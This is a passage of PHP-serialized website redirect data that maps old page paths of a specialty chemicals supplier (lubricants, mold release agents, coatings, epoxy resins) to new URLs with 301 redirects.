s:23:"product/krytox-vpf-1525";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:105;a:4:{s:6:"origin";s:72:"chemicals/krytox-tribosys-teflon-lubricants/krytox-lubricants/nrt-series";s:3:"url";s:72:"chemicals/krytox-tribosys-teflon-lubricants/krytox-lubricants/krytox-nrt";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:106;a:4:{s:6:"origin";s:88:"chemicals/krytox-tribosys-teflon-lubricants/krytox-lubricants/krytox-nrt/nrt-plss-series";s:3:"url";s:88:"chemicals/krytox-tribosys-teflon-lubricants/krytox-lubricants/krytox-nrt/krytox-nrt-plss";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:108;a:4:{s:6:"origin";s:88:"chemicals/krytox-tribosys-teflon-lubricants/krytox-lubricants/krytox-nrt/nrt-8900-series";s:3:"url";s:95:"chemicals/krytox-tribosys-teflon-lubricants/krytox-lubricants/krytox-nrt/krytox-nrt-8900-series";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:109;a:4:{s:6:"origin";s:72:"chemicals/krytox-tribosys-teflon-lubricants/krytox-lubricants/gpl-series";s:3:"url";s:79:"chemicals/krytox-tribosys-teflon-lubricants/krytox-lubricants/krytox-gpl-series";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:110;a:4:{s:6:"origin";s:110:"chemicals/krytox-tribosys-teflon-lubricants/krytox-lubricants/krytox-gpl-series/krytox-gpl-greases/gpl-200-207";s:3:"url";s:117:"chemicals/krytox-tribosys-teflon-lubricants/krytox-lubricants/krytox-gpl-series/krytox-gpl-greases/krytox-gpl-200-207";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:111;a:4:{s:6:"origin";s:39:"chemicals/release-agents/semi-permanent";s:3:"url";s:54:"chemicals/release-agents/semi-permanent-release-agents";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:112;a:4:{s:6:"origin";s:19:"product/releasys-82";s:3:"url";s:49:"product/releasys-82-semi-permanent-release-agents";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:113;a:4:{s:6:"origin";s:8:"products";s:3:"url";s:17:"chemical-products";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:116;a:4:{s:6:"origin";s:110:"chemicals/krytox-tribosys-teflon-lubricants/krytox-lubricants/krytox-gpl-series/krytox-gpl-greases/gpl-210-217";s:3:"url";s:112:"chemicals/krytox-tribosys-teflon-lubricants/krytox-lubricants/krytox-gpl-series/krytox-gpl-greases/krytox-gpl-ep";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:118;a:4:{s:6:"origin";s:117:"chemicals/krytox-tribosys-teflon-lubricants/krytox-lubricants/krytox-gpl-series/krytox-gpl-greases/krytox-gpl-220-227";s:3:"url";s:119:"chemicals/krytox-tribosys-teflon-lubricants/krytox-lubricants/krytox-gpl-series/krytox-gpl-greases/krytox-anticorrosion";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:125;a:4:{s:6:"origin";s:87:"chemicals/krytox-tribosys-teflon-lubricants/krytox-lubricants/aerospace-aviation-series";s:3:"url";s:78:"chemicals/krytox-tribosys-teflon-lubricants/krytox-lubricants/krytox-aerospace";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:126;a:4:{s:6:"origin";s:130:"chemicals/krytox-tribosys-teflon-lubricants/krytox-lubricants/krytox-aerospace/krytox-aerospace-aviation-greases/krytox-240-series";s:3:"url";s:123:"chemicals/krytox-tribosys-teflon-lubricants/krytox-lubricants/krytox-aerospace/krytox-aerospace-aviation-greases/krytox-240";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:127;a:4:{s:6:"origin";s:43:"chemicals/krytox-tribosys-teflon-lubricants";s:3:"url";s:20:"chemicals/lubricants";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:132;a:4:{s:6:"origin";s:89:"chemicals/lubricants/krytox-lubricants/krytox-gpl-series/krytox-gpl-greases/krytox-gpl-ep";s:3:"url";s:103:"chemicals/lubricants/krytox-lubricants/krytox-gpl-series/krytox-gpl-greases/krytox-gpl-extreme-pressure";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:134;a:4:{s:6:"origin";s:19:"product/releasys-89";s:3:"url";s:49:"product/releasys-89-semi-permanent-release-agents";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:137;a:4:{s:6:"origin";s:81:"chemicals/lubricants/krytox-lubricants/krytox-xht/krytox-xht-grease/xht-bd-series";s:3:"url";s:81:"chemicals/lubricants/krytox-lubricants/krytox-xht/krytox-xht-grease/krytox-xht-bd";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:141;a:4:{s:6:"origin";s:80:"chemicals/lubricants/krytox-lubricants/krytox-xht/krytox-xht-grease/xht-s-series";s:3:"url";s:87:"chemicals/lubricants/krytox-lubricants/krytox-xht/krytox-xht-grease/krytox-xht-s-series";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:144;a:4:{s:6:"origin";s:49:"product/releasys-89-semi-permanent-release-agents";s:3:"url";s:37:"product/semi-permanent-release-agents";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:145;a:4:{s:6:"origin";s:32:"opteon-sion-for-vapor-degreasing";s:3:"url";s:28:"opteon-sion-vapor-degreasing";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:146;a:4:{s:6:"origin";s:39:"product/fluoroextreme-dental-lubricants";s:3:"url";s:38:"product/fluoroextreme-dental-lubricant";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:147;a:4:{s:6:"origin";s:42:"mold-release-agents-which-is-right-for-you";s:3:"url";s:19:"mold-release-agents";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:148;a:4:{s:6:"origin";s:29:"npb-and-hcfc-225-replacements";s:3:"url";s:21:"hfcc-npb-replacements";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:149;a:4:{s:6:"origin";s:37:"product/semi-permanent-release-agents";s:3:"url";s:36:"product/semi-permanent-release-agent";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:150;a:4:{s:6:"origin";s:16:"product/releasys";s:3:"url";s:38:"product/semi-permanent-release-agent-2";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:151;a:4:{s:6:"origin";s:36:"product/semi-permanent-release-agent";s:3:"url";s:37:"product/semi-permanent-release-agents";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:152;a:4:{s:6:"origin";s:38:"product/semi-permanent-release-agent-2";s:3:"url";s:42:"product/semi-permanent-mold-release-agents";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:153;a:4:{s:6:"origin";s:19:"product/releasys-88";s:3:"url";s:26:"product/mold-release-agent";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:154;a:4:{s:6:"origin";s:19:"product/releasys-85";s:3:"url";s:37:"product/rubber-molding-release-agents";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:155;a:4:{s:6:"origin";s:21:"product/releasys-8500";s:3:"url";s:36:"product/rubber-molding-release-agent";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:156;a:4:{s:6:"origin";s:33:"krytox-tm7-for-tire-mold-industry";s:3:"url";s:29:"krytox-tm7-tire-mold-industry";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:157;a:4:{s:6:"origin";s:21:"product/releasys-8800";s:3:"url";s:36:"product/composite-mold-release-agent";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:158;a:4:{s:6:"origin";s:36:"krytox-solutions-automotive-industry";s:3:"url";s:28:"krytox-automotive-lubricants";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:161;a:4:{s:6:"origin";s:49:"product/releasys-82-semi-permanent-release-agents";s:3:"url";s:30:"product/dry-film-release-agent";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:162;a:4:{s:6:"origin";s:21:"product/releasys-8200";s:3:"url";s:31:"product/dry-film-release-agents";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:163;a:4:{s:6:"origin";s:16:"product/ms-122av";s:3:"url";s:26:"product/ptfe-release-agent";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:164;a:4:{s:6:"origin";s:16:"product/ms-122se";s:3:"url";s:31:"product/ptfe-mold-release-agent";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:167;a:4:{s:6:"origin";s:16:"product/ms-143te";s:3:"url";s:32:"product/ptfe-mold-release-agents";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:168;a:4:{s:6:"origin";s:16:"product/ms-143xd";s:3:"url";s:35:"product/dry-film-mold-release-agent";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:169;a:4:{s:6:"origin";s:16:"product/ms-122ad";s:3:"url";s:35:"product/dry-film-ptfe-release-agent";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:170;a:4:{s:6:"origin";s:43:"chemicals/release-agents/ptfe-release-agent";s:3:"url";s:44:"chemicals/release-agents/ptfe-release-agents";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:171;a:4:{s:6:"origin";s:16:"product/ms-143ax";s:3:"url";s:36:"product/universal-ptfe-release-agent";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:172;a:4:{s:6:"origin";s:15:"product/ms-475c";s:3:"url";s:34:"product/acrylic-conformal-coatings";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:173;a:4:{s:6:"origin";s:15:"product/ms-477c";s:3:"url";s:33:"product/acrylic-conformal-coating";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:174;a:4:{s:6:"origin";s:33:"product/acrylic-conformal-coating";s:3:"url";s:42:"product/acrylic-conformal-coating-mil-spec";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:175;a:4:{s:6:"origin";s:15:"product/ms-465c";s:3:"url";s:25:"product/acrylic-conformal";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:176;a:4:{s:6:"origin";s:15:"product/ms-467c";s:3:"url";s:23:"product/acrylic-coating";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:177;a:4:{s:6:"origin";s:15:"product/ms-470c";s:3:"url";s:35:"product/urethane-conformal-coatings";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:178;a:4:{s:6:"origin";s:15:"product/ms-472c";s:3:"url";s:24:"product/urethane-coating";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:179;a:4:{s:6:"origin";s:14:"chemicals/vazo";s:3:"url";s:33:"chemicals/vazo-radical-initiators";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:180;a:4:{s:6:"origin";s:15:"product/vazo-64";s:3:"url";s:33:"product/vazo-64-radical-initiator";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:181;a:4:{s:6:"origin";s:15:"product/vazo-67";s:3:"url";s:26:"product/radical-initiators";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:182;a:4:{s:6:"origin";s:29:"chemicals/epoxy-resin-systems";s:3:"url";s:22:"chemicals/epoxy-resins";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:183;a:4:{s:6:"origin";s:18:"epoxy-and-coatings";s:3:"url";s:11:"epoxy-resin";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:184;a:4:{s:6:"origin";s:11:"epoxy-resin";s:3:"url";s:30:"epoxy-resin-conformal-coatings";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:185;a:4:{s:6:"origin";s:26:"product/radical-initiators";s:3:"url";s:33:"product/vazo-67-radical-initiator";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:186;a:4:{s:6:"origin";s:47:"product/shieldsys-rfi-nickel-conductive-coating";s:3:"url";s:26:"product/conductive-coating";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:187;a:4:{s:6:"origin";s:36:"product/ms-111-epoxy-stripping-agent";s:3:"url";s:29:"product/epoxy-stripping-agent";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:188;a:4:{s:6:"origin";s:15:"product/vazo-88";s:3:"url";s:33:"product/vazo-88-radical-initiator";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:189;a:4:{s:6:"origin";s:38:"product/fluoroextreme-dental-lubricant";s:3:"url";s:24:"product/dental-lubricant";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:190;a:4:{s:6:"origin";s:28:"opteon-sion-vapor-degreasing";s:3:"url";s:36:"opteon-sion-vapor-degreasing-solvent";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:191;a:4:{s:6:"origin";s:15:"product/vazo-52";s:3:"url";s:33:"product/vazo-52-radical-initiator";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:192;a:4:{s:6:"origin";s:15:"product/ms-114c";s:3:"url";s:34:"product/conformal-coating-stripper";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:193;a:4:{s:6:"origin";s:15:"product/suprion";s:3:"url";s:22:"product/opteon-suprion";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:194;a:4:{s:6:"origin";s:30:"product/fluoropolymer-coatings";s:3:"url";s:38:"product/fluoropolymer-medical-coatings";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:195;a:4:{s:6:"origin";s:55:"chemicals/conformal-coatings/silicone-confromal-coating";s:3:"url";s:55:"chemicals/conformal-coatings/silicone-conformal-coating";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:196;a:4:{s:6:"origin";s:15:"product/ms-460h";s:3:"url";s:35:"product/silicone-conformal-coatings";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:197;a:4:{s:6:"origin";s:15:"product/ms-462h";s:3:"url";s:24:"product/silicone-coating";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:198;a:4:{s:6:"origin";s:24:"product/silicone-coating";s:3:"url";s:35:"product/silicone-electronic-coating";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:199;a:4:{s:6:"origin";s:12:"home_003.htm";s:3:"url";s:1:"/";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:200;a:4:{s:6:"origin";s:12:"home_002.htm";s:3:"url";s:1:"/";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:201;a:4:{s:6:"origin";s:21:"products/default.aspx";s:3:"url";s:17:"chemical-products";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:202;a:4:{s:6:"origin";s:12:"home_001.htm";s:3:"url";s:1:"/";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:203;a:4:{s:6:"origin";s:13:"prodtable.htm";s:3:"url";s:17:"chemical-products";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:204;a:4:{s:6:"origin";s:9:"additives";s:3:"url";s:17:"chemical-products";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:205;a:4:{s:6:"origin";s:20:"connector-lubricants";s:3:"url";s:61:"chemicals/lubricants/tribosys-lubricants/connector-lubricants";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:206;a:4:{s:6:"origin";s:27:"low-global-warming-products";s:3:"url";s:26:"chemicals/solvents/solvsys";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:208;a:4:{s:6:"origin";s:28:"protectiveconformal-coatings";s:3:"url";s:28:"chemicals/conformal-coatings";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:209;a:4:{s:6:"origin";s:18:"specialty-products";s:3:"url";s:28:"chemicals/specialty-products";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:210;a:4:{s:6:"origin";s:29:"us-government-and-other-specs";s:3:"url";s:12:"tech-support";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:211;a:4:{s:6:"origin";s:57:"404.aspx?aspxerrorpath=/cobra-and-reg-aerosol-accessories";s:3:"url";s:28:"chemicals/specialty-products";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:212;a:4:{s:6:"origin";s:70:"404.aspx?aspxerrorpath=/cobra-and-reg-aerosol-accessories/default.aspx";s:3:"url";s:28:"chemicals/specialty-products";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:213;a:4:{s:6:"origin";s:85:"404.aspx?aspxerrorpath=/krytox®_fluorinated_synthetic_lubricant_aerosol/default.aspx";s:3:"url";s:58:"chemicals/lubricants/tribosys-lubricants/pfpe-oils-greases";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:214;a:4:{s:6:"origin";s:39:"404.aspx?aspxerrorpath=/krytox_cleaners";s:3:"url";s:26:"chemicals/solvents/vertrel";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:215;a:4:{s:6:"origin";s:52:"404.aspx?aspxerrorpath=/krytox_cleaners/default.aspx";s:3:"url";s:26:"chemicals/solvents/vertrel";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:216;a:4:{s:6:"origin";s:53:"404.aspx?aspxerrorpath=/other-lubricants/default.aspx";s:3:"url";s:20:"chemicals/lubricants";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:217;a:4:{s:6:"origin";s:20:"aero-duster/?print=y";s:3:"url";s:26:"product/aeroduster-ms-222n";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:218;a:4:{s:6:"origin";s:12:"aero-duster_";s:3:"url";s:26:"product/aeroduster-ms-222n";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:219;a:4:{s:6:"origin";s:12:"aero_002.htm";s:3:"url";s:26:"product/aeroduster-ms-222n";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:220;a:4:{s:6:"origin";s:12:"aero_010.htm";s:3:"url";s:26:"product/aeroduster-ms-222n";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:221;a:4:{s:6:"origin";s:16:"aerospace-grades";s:3:"url";s:55:"chemicals/lubricants/krytox-lubricants/krytox-aerospace";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:222;a:4:{s:6:"origin";s:25:"aerospace_grades/?print=y";s:3:"url";s:55:"chemicals/lubricants/krytox-lubricants/krytox-aerospace";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:223;a:4:{s:6:"origin";s:16:"aerospace_grades";s:3:"url";s:55:"chemicals/lubricants/krytox-lubricants/krytox-aerospace";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:224;a:4:{s:6:"origin";s:17:"alert_/?Archive=y";s:3:"url";s:17:"chemical-products";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:225;a:4:{s:6:"origin";s:36:"camx_show_2014-booth_1974/?Archive=y";s:3:"url";s:4:"news";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:226;a:4:{s:6:"origin";s:24:"cleaning_agent_/?print=y";s:3:"url";s:18:"chemicals/solvents";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:227;a:4:{s:6:"origin";s:36:"cobra®_solvent_spray_cleaning_brush";s:3:"url";s:20:"product/cobra-duster";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:228;a:4:{s:6:"origin";s:45:"cobra®_solvent_spray_cleaning_brush/?print=y";s:3:"url";s:20:"product/cobra-duster";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:229;a:4:{s:6:"origin";s:33:"cobra-and-reg-aerosol-accessories";s:3:"url";s:28:"chemicals/specialty-products";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:230;a:4:{s:6:"origin";s:27:"conformal-coating-strippers";s:3:"url";s:28:"chemicals/conformal-coatings";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:231;a:4:{s:6:"origin";s:41:"conformal_coating_stripper_ms-114c_ms-115";s:3:"url";s:28:"chemicals/conformal-coatings";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:232;a:4:{s:6:"origin";s:20:"epoxy_resins_004.htm";s:3:"url";s:22:"chemicals/epoxy-resins";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:233;a:4:{s:6:"origin";s:13:"contact_re-nu";s:3:"url";s:21:"product/contact-re-nu";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:234;a:4:{s:6:"origin";s:22:"contact_re-nu/?print=y";s:3:"url";s:21:"product/contact-re-nu";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:235;a:4:{s:6:"origin";s:17:"contact_re-nu_lgw";s:3:"url";s:21:"product/contact-re-nu";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:236;a:4:{s:6:"origin";s:46:"dupont%E2%84%A2-krytox%C2%AE-gpl-oils--greases";s:3:"url";s:56:"chemicals/lubricants/krytox-lubricants/krytox-gpl-series";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:237;a:4:{s:6:"origin";s:43:"dupont%E2%84%A2-krytox%C2%AE-nrt-lubricants";s:3:"url";s:49:"chemicals/lubricants/krytox-lubricants/krytox-nrt";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:238;a:4:{s:6:"origin";s:43:"dupont%E2%84%A2-krytox%C2%AE-xht-lubricants";s:3:"url";s:49:"chemicals/lubricants/krytox-lubricants/krytox-xht";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:239;a:4:{s:6:"origin";s:36:"dupont_krytox_fluorinated_lubricants";s:3:"url";s:38:"chemicals/lubricants/krytox-lubricants";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:240;a:4:{s:6:"origin";s:7:"en-rust";s:3:"url";s:22:"product/rust-inhibitor";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:241;a:4:{s:6:"origin";s:16:"en-rust/?print=y";s:3:"url";s:22:"product/rust-inhibitor";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:242;a:4:{s:6:"origin";s:17:"en-rust1/?print=y";s:3:"url";s:22:"product/rust-inhibitor";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:243;a:4:{s:6:"origin";s:21:"epikure-curing-agents";s:3:"url";s:44:"chemicals/epoxy-resins/epikure-curing-agents";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:244;a:4:{s:6:"origin";s:30:"epikure-curing-agents/?print=y";s:3:"url";s:44:"chemicals/epoxy-resins/epikure-curing-agents";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:245;a:4:{s:6:"origin";s:30:"epirez-waterborne-epoxy-resins";s:3:"url";s:54:"chemicals/epoxy-resins/epirez-waterborne-resin-epi-rez";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:246;a:4:{s:6:"origin";s:26:"epon-epoxy-resins/?print=y";s:3:"url";s:33:"chemicals/epoxy-resins/epon-epoxy";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:247;a:4:{s:6:"origin";s:13:"eponol-resins";s:3:"url";s:22:"chemicals/epoxy-resins";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:248;a:4:{s:6:"origin";s:28:"epoxy_adhesive-kits/?print=y";s:3:"url";s:48:"chemicals/epoxy-resins/epoxy-adhesive-kit-ms-907";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:249;a:4:{s:6:"origin";s:16:"epoxy_resins.htm";s:3:"url";s:22:"chemicals/epoxy-resins";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:250;a:4:{s:6:"origin";s:20:"epoxy_resins_002.htm";s:3:"url";s:22:"chemicals/epoxy-resins";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:251;a:4:{s:6:"origin";s:20:"epoxy_resins_003.htm";s:3:"url";s:22:"chemicals/epoxy-resins";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:252;a:4:{s:6:"origin";s:20:"epoxy_resins_005.htm";s:3:"url";s:22:"chemicals/epoxy-resins";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:253;a:4:{s:6:"origin";s:20:"epoxy_resins_006.htm";s:3:"url";s:22:"chemicals/epoxy-resins";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:254;a:4:{s:6:"origin";s:20:"epoxy_resins_007.htm";s:3:"url";s:22:"chemicals/epoxy-resins";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:255;a:4:{s:6:"origin";s:20:"epoxy_resins_009.htm";s:3:"url";s:22:"chemicals/epoxy-resins";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:256;a:4:{s:6:"origin";s:20:"epoxy_resins_010.htm";s:3:"url";s:22:"chemicals/epoxy-resins";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:257;a:4:{s:6:"origin";s:28:"epoxy_stripping_agent_ms-111";s:3:"url";s:29:"product/epoxy-stripping-agent";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:258;a:4:{s:6:"origin";s:47:"extreme_high_temperature_release_agent/?print=y";s:3:"url";s:41:"chemicals/release-agents/high-temperature";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:259;a:4:{s:6:"origin";s:29:"fluorinated_lubricant_aerosol";s:3:"url";s:58:"chemicals/lubricants/tribosys-lubricants/pfpe-oils-greases";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:260;a:4:{s:6:"origin";s:35:"fluorinated_lubricant_aerosol/?pg=2";s:3:"url";s:58:"chemicals/lubricants/tribosys-lubricants/pfpe-oils-greases";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:261;a:4:{s:6:"origin";s:43:"fluorinated_lubricant_aerosol/?pg=3&print=y";s:3:"url";s:58:"chemicals/lubricants/tribosys-lubricants/pfpe-oils-greases";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:262;a:4:{s:6:"origin";s:34:"fluoro-extreme%E2%84%A2-lubricants";s:3:"url";s:58:"chemicals/lubricants/tribosys-lubricants/pfpe-oils-greases";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:263;a:4:{s:6:"origin";s:34:"fluoro_extreme%E2%84%A2_lubricants";s:3:"url";s:58:"chemicals/lubricants/tribosys-lubricants/pfpe-oils-greases";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:264;a:4:{s:6:"origin";s:43:"fluoro_extreme%E2%84%A2_lubricants/?print=y";s:3:"url";s:58:"chemicals/lubricants/tribosys-lubricants/pfpe-oils-greases";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:265;a:4:{s:6:"origin";s:33:"heavy_duty_solvent__flux_remover_";s:3:"url";s:18:"chemicals/solvents";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:266;a:4:{s:6:"origin";s:42:"heavy_duty_solvent__flux_remover_/?print=y";s:3:"url";s:18:"chemicals/solvents";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:267;a:4:{s:6:"origin";s:50:"heavy_duty_solvent__no_clean_flux_remover/?print=y";s:3:"url";s:18:"chemicals/solvents";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:268;a:4:{s:6:"origin";s:16:"heloxy-modifiers";s:3:"url";s:55:"chemicals/epoxy-resins/heloxyepoxy-functional-modifiers";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:269;a:4:{s:6:"origin";s:25:"heloxy-modifiers/?print=y";s:3:"url";s:55:"chemicals/epoxy-resins/heloxyepoxy-functional-modifiers";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:270;a:4:{s:6:"origin";s:21:"home_001.htm?3e3ea140";s:3:"url";s:1:"/";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:271;a:4:{s:6:"origin";s:12:"home_004.htm";s:3:"url";s:1:"/";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:272;a:4:{s:6:"origin";s:9:"index.htm";s:3:"url";s:1:"/";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:273;a:4:{s:6:"origin";s:14:"ipc__san_diego";s:3:"url";s:4:"news";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:274;a:4:{s:6:"origin";s:33:"ipc__san_diego/?Archive=y&print=y";s:3:"url";s:4:"news";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:275;a:4:{s:6:"origin";s:52:"krytox%C2%AE_fluorinated_synthetic_lubricant_aerosol";s:3:"url";s:58:"chemicals/lubricants/tribosys-lubricants/pfpe-oils-greases";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:276;a:4:{s:6:"origin";s:10:"krytox.htm";s:3:"url";s:6:"krytox";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:277;a:4:{s:6:"origin";s:14:"krytox_002.htm";s:3:"url";s:6:"krytox";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:278;a:4:{s:6:"origin";s:14:"krytox_003.htm";s:3:"url";s:6:"krytox";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:279;a:4:{s:6:"origin";s:14:"krytox_004.htm";s:3:"url";s:6:"krytox";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:280;a:4:{s:6:"origin";s:14:"krytox_005.htm";s:3:"url";s:6:"krytox";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:281;a:4:{s:6:"origin";s:15:"krytox_cleaners";s:3:"url";s:18:"chemicals/solvents";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:282;a:4:{s:6:"origin";s:13:"krytoxaerosol";s:3:"url";s:58:"chemicals/lubricants/tribosys-lubricants/pfpe-oils-greases";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:283;a:4:{s:6:"origin";s:36:"lgw_heavy_duty_solvent__flux_remover";s:3:"url";s:26:"chemicals/solvents/solvsys";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:284;a:4:{s:6:"origin";s:7:"lit.htm";s:3:"url";s:8:"articles";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:285;a:4:{s:6:"origin";s:27:"low_global_warming_products";s:3:"url";s:26:"chemicals/solvents/solvsys";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:286;a:4:{s:6:"origin";s:38:"low_global_warming_products/?Archive=y";s:3:"url";s:26:"chemicals/solvents/solvsys";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:287;a:4:{s:6:"origin";s:46:"low_global_warming_products/?Archive=y&print=y";s:3:"url";s:26:"chemicals/solvents/solvsys";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:288;a:4:{s:6:"origin";s:21:"md__m_west_trade_show";s:3:"url";s:4:"news";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:289;a:4:{s:6:"origin";s:32:"md__m_west_trade_show/?A